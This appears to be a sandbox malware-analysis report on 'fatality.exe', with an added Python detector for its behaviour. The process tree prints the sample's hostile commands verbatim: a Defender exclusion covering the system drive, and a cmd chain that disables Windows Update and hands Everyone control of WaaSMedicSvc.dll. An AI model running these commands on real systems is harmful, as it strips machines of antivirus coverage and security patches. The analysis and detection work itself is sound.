Analysis
- Max time kernel: 21s
- Platform: windows7_x64
- Resource: win7-20220812-en
- Resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
- Submitted: 23-11-2022 16:52
- Static task: static1
General
- Target: fatality.exe
- Size: 4.4MB
- MD5: 96730495621816d6e5082a95574bd9d5
- SHA1: b62168945da2966f4c4122f49df0e0ba5751ec0a
- SHA256: e7ea0aaed1c2dea3cda5661fd66693909f63f1978bf07d25d90e6a5cfd310ef0
- SHA512: a7ea21f0b8501ea0e00b6f01c6b2ea433f34129e1379e5ba877d81d1be15e9c128c3b4c7f911241ca82d14dbd8aacaf0f03d919a77826074c0ce2f57216d80b1
- SSDEEP: 98304:hU4R+GsvqbiXke/i06xLTDqGg9hGzkI5GYsgd1N9RZxxlgu:uOmvqbiU0iDZTDI9AzkI56gdz9RXL
Malware Config
Signatures

Modifies security service (2 TTPs, 2 IoCs)
Processes (description / IoC / process):
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters (reg.exe)
- Key deleted: \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security (reg.exe)

Possible privilege escalation attempt (2 IoCs)
Processes:
- PID 452 takeown.exe
- PID 884 icacls.exe

Stops running service(s) (3 TTPs)

Modifies file permissions (1 TTP, 2 IoCs)
Processes:
- PID 452 takeown.exe
- PID 884 icacls.exe

Drops file in System32 directory (1 IoC)
Processes (description / IoC / process):
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.exe)

Launches sc.exe (5 IoCs)
sc.exe is a Windows utility to control services on the system.
Processes:
- PID 1420 sc.exe
- PID 1820 sc.exe
- PID 1688 sc.exe
- PID 1116 sc.exe
- PID 544 sc.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour. (This is the sandbox's generic description for the signature; no file-encryption activity appears anywhere else in this report.)

Modifies registry key (1 TTP, 5 IoCs)
Processes:
- PID 1132 reg.exe
- PID 1872 reg.exe
- PID 2040 reg.exe
- PID 840 reg.exe
- PID 1724 reg.exe

Suspicious behavior: EnumeratesProcesses (1 IoC)
Processes:
- PID 1992 powershell.exe

Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes (description / PID / process):
- Token: SeDebugPrivilege, PID 1992 powershell.exe
- Token: SeShutdownPrivilege, PID 1124 powercfg.exe
- Token: SeShutdownPrivilege, PID 1028 powercfg.exe
- Token: SeShutdownPrivilege, PID 1168 powercfg.exe
- Token: SeShutdownPrivilege, PID 1208 powercfg.exe
- Token: SeTakeOwnershipPrivilege, PID 452 takeown.exe

Suspicious use of WriteProcessMemory (57 IoCs)
Processes (the raw report records each parent-to-child write three times; the 19 distinct pairs are listed once each, in order of first appearance):
- PID 2012 fatality.exe wrote to memory of PID 1992 powershell.exe
- PID 2012 fatality.exe wrote to memory of PID 1476 cmd.exe
- PID 2012 fatality.exe wrote to memory of PID 1440 cmd.exe
- PID 1476 cmd.exe wrote to memory of PID 1116 sc.exe
- PID 1440 cmd.exe wrote to memory of PID 1124 powercfg.exe
- PID 1476 cmd.exe wrote to memory of PID 544 sc.exe
- PID 1476 cmd.exe wrote to memory of PID 1420 sc.exe
- PID 1440 cmd.exe wrote to memory of PID 1028 powercfg.exe
- PID 1476 cmd.exe wrote to memory of PID 1820 sc.exe
- PID 1476 cmd.exe wrote to memory of PID 1688 sc.exe
- PID 1440 cmd.exe wrote to memory of PID 1168 powercfg.exe
- PID 1476 cmd.exe wrote to memory of PID 1872 reg.exe
- PID 1440 cmd.exe wrote to memory of PID 1208 powercfg.exe
- PID 1476 cmd.exe wrote to memory of PID 2040 reg.exe
- PID 1476 cmd.exe wrote to memory of PID 840 reg.exe
- PID 1476 cmd.exe wrote to memory of PID 1724 reg.exe
- PID 1476 cmd.exe wrote to memory of PID 1132 reg.exe
- PID 1476 cmd.exe wrote to memory of PID 452 takeown.exe
- PID 1476 cmd.exe wrote to memory of PID 884 icacls.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\fatality.exe (PID 2012, depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\fatality.exe"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1992, depth 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AdQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBzAGYAdQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AGUAIwA+AA=="
    Decoded -EncodedCommand (base64 of UTF-16LE text): <#ny#> Add-MpPreference <#mu#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#sfu#> -Force <#xe#>
    The <#..#> block comments are filler that PowerShell ignores, so the effective command is Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force: a Microsoft Defender exclusion covering the user profile and the whole system drive.
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\cmd.exe (PID 1476, depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    This chain stops and unregisters the five Windows Update services (UsoSvc, WaaSMedicSvc, wuauserv, bits, dosvc), takes ownership of WaaSMedicSvc.dll and grants Everyone (S-1-1-0) full control before renaming it, sets WindowsUpdate\AU policy values that turn automatic updates off, and disables the update scheduled tasks. Only the sc stop, reg delete, takeown and icacls steps appear as child processes below; the rename (a cmd built-in), the reg add and the SCHTASKS steps have no recorded children in this run.
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\sc.exe (PID 1116, depth 3)
      Command line: sc stop UsoSvc
      - Launches sc.exe
    - C:\Windows\system32\sc.exe (PID 544, depth 3)
      Command line: sc stop WaaSMedicSvc
      - Launches sc.exe
    - C:\Windows\system32\sc.exe (PID 1420, depth 3)
      Command line: sc stop wuauserv
      - Launches sc.exe
    - C:\Windows\system32\sc.exe (PID 1820, depth 3)
      Command line: sc stop bits
      - Launches sc.exe
    - C:\Windows\system32\sc.exe (PID 1688, depth 3)
      Command line: sc stop dosvc
      - Launches sc.exe
    - C:\Windows\system32\reg.exe (PID 1872, depth 3)
      Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
      - Modifies registry key
    - C:\Windows\system32\reg.exe (PID 2040, depth 3)
      Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
      - Modifies registry key
    - C:\Windows\system32\reg.exe (PID 840, depth 3)
      Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
      - Modifies security service
      - Modifies registry key
    - C:\Windows\system32\reg.exe (PID 1724, depth 3)
      Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
      - Modifies registry key
    - C:\Windows\system32\reg.exe (PID 1132, depth 3)
      Command line: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
      - Modifies registry key
    - C:\Windows\system32\takeown.exe (PID 452, depth 3)
      Command line: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\icacls.exe (PID 884, depth 3)
      Command line: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
      - Possible privilege escalation attempt
      - Modifies file permissions
  - C:\Windows\System32\cmd.exe (PID 1440, depth 2)
    Command line: "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
    Setting every hibernate and standby timeout to 0 disables them, keeping the host awake on both AC and battery power.
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\powercfg.exe (PID 1124, depth 3)
      Command line: powercfg /x -hibernate-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\powercfg.exe (PID 1028, depth 3)
      Command line: powercfg /x -hibernate-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\powercfg.exe (PID 1168, depth 3)
      Command line: powercfg /x -standby-timeout-ac 0
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\powercfg.exe (PID 1208, depth 3)
      Command line: powercfg /x -standby-timeout-dc 0
      - Suspicious use of AdjustPrivilegeToken
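The cmd.exe chain above is the substance of this report: it stops and unregisters the Windows Update stack, takes ownership of WaaSMedicSvc.dll and hands Everyone full control, sets WindowsUpdate\AU policy values and disables the update scheduled tasks, while the PowerShell child adds a Defender exclusion for the user profile and the system drive. One caveat for anyone reading the observed effects: the sandbox platform is Windows 7, where UsoSvc, WaaSMedicSvc and DoSvc do not exist and the Defender PowerShell cmdlets are not available, so the recorded tree understates what the same chain does on Windows 10, and a detector should key on the command lines rather than on effects. The following Python is an added example written for this page, not code from the report or from the sample. It decodes the -EncodedCommand payload (base64 over UTF-16LE), strips the <#..#> filler comments, splits the cmd /c chain so each step is scored even where no child process was recorded, and tags each command line. The event list is constructed from the process tree (the cmd.exe chain is shortened to one command of each kind); pids 4242 and 4343 are made-up benign controls, and the tag names and the three-category threshold in verdict() are my own choices, not anything the sandbox defines.

```python
"""Added example (not part of the sandbox report or the sample): decode the
-EncodedCommand from the tree above and flag the update-stack / Defender
tampering chain in process-creation events constructed from that tree."""
import base64
import re

# Copied verbatim from the powershell.exe entry in the process tree.
ENCODED = (
    "PAAjAG4AeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA"
    "PAAjAG0AdQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgA"
    "JABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkA"
    "cwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBzAGYAdQAjAD4AIAAtAEYAbwByAGMA"
    "ZQAgADwAIwB4AGUAIwA+AA=="
)
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)
# Windows Update stack services the chain stops and unregisters.
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}

def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE text, not UTF-8."""
    return base64.b64decode(b64).decode("utf-16-le")

def strip_block_comments(script: str) -> str:
    """Drop the <#..#> filler that breaks substring signatures; PowerShell ignores it."""
    return " ".join(BLOCK_COMMENT.sub(" ", script).split())

def expand_cmd_chain(cmdline: str) -> list[str]:
    """'cmd /c a & b' runs a then b: score both, even if no child process was logged."""
    parts = cmdline.replace('"', "").split(None, 2)
    if len(parts) == 3 and parts[0].lower().endswith("cmd.exe") and parts[1].lower() == "/c":
        return [p.strip() for p in parts[2].split("&") if p.strip()]
    return [cmdline]

def classify_command(cmdline: str) -> set[str]:
    """Tamper tags (my own names) matched by one un-chained command line."""
    raw = cmdline.replace('"', "").split()
    tok = [t.lower() for t in raw]
    if not tok:
        return set()
    exe = tok[0].rsplit("\\", 1)[-1].removesuffix(".exe")
    tags = set()
    if exe in ("powershell", "pwsh"):
        # PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc ...).
        i = next((k for k, t in enumerate(tok) if len(t) > 1 and "-encodedcommand".startswith(t)), None)
        if i is not None and i + 1 < len(raw):
            script = strip_block_comments(decode_encoded_command(raw[i + 1])).lower()
            if "add-mppreference" in script and "-exclusionpath" in script:
                tags.add("defender_exclusion_added")
    elif exe == "sc" and len(tok) > 2 and tok[1] == "stop" and tok[2] in UPDATE_SERVICES:
        tags.add("update_service_stopped")
    elif exe == "reg" and len(tok) > 2:
        key = tok[2]
        if tok[1] == "delete" and "\\services\\" in key and key.rsplit("\\", 1)[-1] in UPDATE_SERVICES:
            tags.add("update_service_key_deleted")
        elif tok[1] == "add" and key.endswith("\\windowsupdate\\au") and "/v" in tok:
            tags.add("update_policy_modified")
    elif exe in ("takeown", "icacls", "rename", "ren") and any(t.endswith("waasmedicsvc.dll") for t in tok):
        tags.add("waasmedicsvc_dll_tampered")
    elif exe == "schtasks" and "/disable" in tok and any("windowsupdate" in t or "updateorchestrator" in t for t in tok):
        tags.add("update_task_disabled")
    elif exe == "powercfg" and "/x" in tok and tok[-1] == "0" and any(t.endswith(("-timeout-ac", "-timeout-dc")) for t in tok):
        tags.add("sleep_hibernate_disabled")
    return tags

def analyze(events):
    """events: iterable of (pid, ppid, cmdline) -> {pid: tags} for processes that matched."""
    findings = {}
    for pid, _ppid, cmdline in events:
        tags = set().union(*(classify_command(p) for p in expand_cmd_chain(cmdline)))
        if tags:
            findings[pid] = tags
    return findings

def verdict(findings) -> str:
    """One stopped service is admin work; three or more distinct tamper kinds is the pattern."""
    return "update-killer" if len(set().union(*findings.values())) >= 3 else "benign"

# (pid, ppid, command line) constructed from the process tree above; the cmd.exe chain is
# shortened to one command of each kind, and pids 4242/4343 are made-up benign controls.
EVENTS = [
    (2012, 1, r'"C:\Users\Admin\AppData\Local\Temp\fatality.exe"'),
    (1992, 2012, '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
                 f'-EncodedCommand "{ENCODED}"'),
    (1476, 2012, r'"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc'
                 r' & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f'
                 r' & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll'
                 r' & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll'
                 r' & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f'
                 r' & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE'),
    (1116, 1476, "sc stop UsoSvc"),
    (1124, 1440, "powercfg /x -hibernate-timeout-ac 0"),
    (4242, 3000, "sc stop Spooler"),
    (4343, 3000, r"reg delete HKCU\Software\Example /f"),
]

if __name__ == "__main__":
    print(strip_block_comments(decode_encoded_command(ENCODED)))
    print({pid: sorted(t) for pid, t in analyze(EVENTS).items()}, verdict(analyze(EVENTS)))
```

To run this against real telemetry, feed it (pid, ppid, CommandLine) from Sysmon event 1 or Security event 4688 (4688 only carries the command line when "Include command line in process creation events" is enabled). The Defender exclusion deserves a high severity on its own, independent of the threshold: an exclusion covering $env:SystemDrive blinds Defender to everything the sample drops afterwards, and it is the one step of this tree that leaves no service, file or task change to notice later.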
Network
MITRE ATT&CK Enterprise v6
Downloads
- memory/452-81-0x0000000000000000-mapping.dmp
- memory/544-69-0x0000000000000000-mapping.dmp
- memory/840-78-0x0000000000000000-mapping.dmp
- memory/884-82-0x0000000000000000-mapping.dmp
- memory/1028-71-0x0000000000000000-mapping.dmp
- memory/1116-67-0x0000000000000000-mapping.dmp
- memory/1124-68-0x0000000000000000-mapping.dmp
- memory/1132-80-0x0000000000000000-mapping.dmp
- memory/1168-74-0x0000000000000000-mapping.dmp
- memory/1208-76-0x0000000000000000-mapping.dmp
- memory/1420-70-0x0000000000000000-mapping.dmp
- memory/1440-66-0x0000000000000000-mapping.dmp
- memory/1476-65-0x0000000000000000-mapping.dmp
- memory/1688-73-0x0000000000000000-mapping.dmp
- memory/1724-79-0x0000000000000000-mapping.dmp
- memory/1820-72-0x0000000000000000-mapping.dmp
- memory/1872-75-0x0000000000000000-mapping.dmp
- memory/1992-64-0x000000000258B000-0x00000000025AA000-memory.dmp (124KB)
- memory/1992-63-0x0000000002584000-0x0000000002587000-memory.dmp (12KB)
- memory/1992-62-0x000000000258B000-0x00000000025AA000-memory.dmp (124KB)
- memory/1992-61-0x000000001B730000-0x000000001BA2F000-memory.dmp (3.0MB)
- memory/1992-59-0x000007FEECEB0000-0x000007FEEDA0D000-memory.dmp (11.4MB)
- memory/1992-60-0x0000000002584000-0x0000000002587000-memory.dmp (12KB)
- memory/1992-58-0x000007FEEDA10000-0x000007FEEE433000-memory.dmp (10.1MB)
- memory/1992-56-0x0000000000000000-mapping.dmp
- memory/2012-54-0x000000013FA70000-0x000000013FED0000-memory.dmp (4.4MB)
- memory/2012-55-0x000007FEFC371000-0x000007FEFC373000-memory.dmp (8KB)
- memory/2040-77-0x0000000000000000-mapping.dmp